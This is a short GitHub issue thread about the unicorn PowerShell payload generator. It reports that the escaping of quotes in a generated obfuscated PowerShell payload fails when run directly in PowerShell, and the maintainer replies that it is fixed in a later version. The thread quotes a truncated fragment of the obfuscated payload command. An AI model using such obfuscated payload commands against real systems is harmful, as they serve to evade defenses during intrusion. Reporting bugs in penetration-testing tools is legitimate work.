### ISSUE TITLE
Random quotes escape \" does not work in powershell

### ISSUE THREAD

**Issue by zvaratom** [trustedsec/unicorn#139]
Hi, I am not sure if this is an intended behavior, but I spend some time on this issue so I will post it here. The double quote version payload does not work for me when run directly from powershell (due to the redundant **\\** as escape sign for cmd)
` powershell /C "s\"\"v Qf -;s\"\"v Dl e\"\"c;s\"\"v mg ((g\"\"v Qf).value.toString()+(g\"\"v Dl).value.toString()) ...`

Error message:
```s\ : The term 's\' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the
spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1```

**Comment by HackingDave** [comment]
Fixed in 3.8.6, thanks!
